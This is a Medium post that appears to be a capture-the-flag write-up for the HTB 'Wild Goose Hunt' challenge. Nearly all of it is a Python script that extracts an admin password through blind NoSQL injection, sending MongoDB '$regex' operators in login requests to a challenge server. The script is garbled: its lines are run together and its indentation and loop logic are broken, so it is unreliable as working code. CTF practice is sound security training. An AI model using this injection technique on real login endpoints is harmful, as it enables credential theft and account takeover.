HTB Cyber Apocalypse CTF 2021: Wild Goose Hunt

import requestsimport stringimport jsonurl = "http://138.68.132.86:32399/api/login"headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}possible_chars = list(string.ascii_letters) + list(string.digits) + ["\\"+c for c in string.punctuation+string.whitespace ]def get_password(username):    print("Extracting password of "+username)    password = "CHTB"    while True:        for c in possible_chars:            payload = {"username": "admin","password":     {"$regex":password+c+ ".*" }}            print(payload)            pr = requests.post(url ,data=json.dumps(payload), headers=headers)            print(pr.text)    if "admin" in pr.text:        password += c        print(password)    break    if c == possible_chars[-1]:        print("Found password "+password[0:].replace("\\", "")+" for username "+username)get_password("admin")

Спасибо :) — Mudhalai Mr Team 1nf1n1ty

--

--

--

<>AKA Gowtham Student at SASTRA Deemed university, Core team member DSC SASTRA </>

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Proof-of-Coverage and Consensus Group Improvements: Call for Discussion

{UPDATE} Farm Animals - Activity Book Hack Free Resources Generator

Practical Cryptography — Part V

Crypto Coins and Cyber Security Risks

Week 1 is already done!

MicroProject: Pyfer

Pre-sale end with 30% cap!

Kioptrix Level 3 — VulnHub

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Mudhalai Mr

Mudhalai Mr

<>AKA Gowtham Student at SASTRA Deemed university, Core team member DSC SASTRA </>

More from Medium

DNS in Detail — Try Hack Me WriteUp

TryHackMe Writeup —  VulnNet Internal

Active Directory Penetration Testing & THM VulnNet: Roasted

CTF Write-Up: Evolution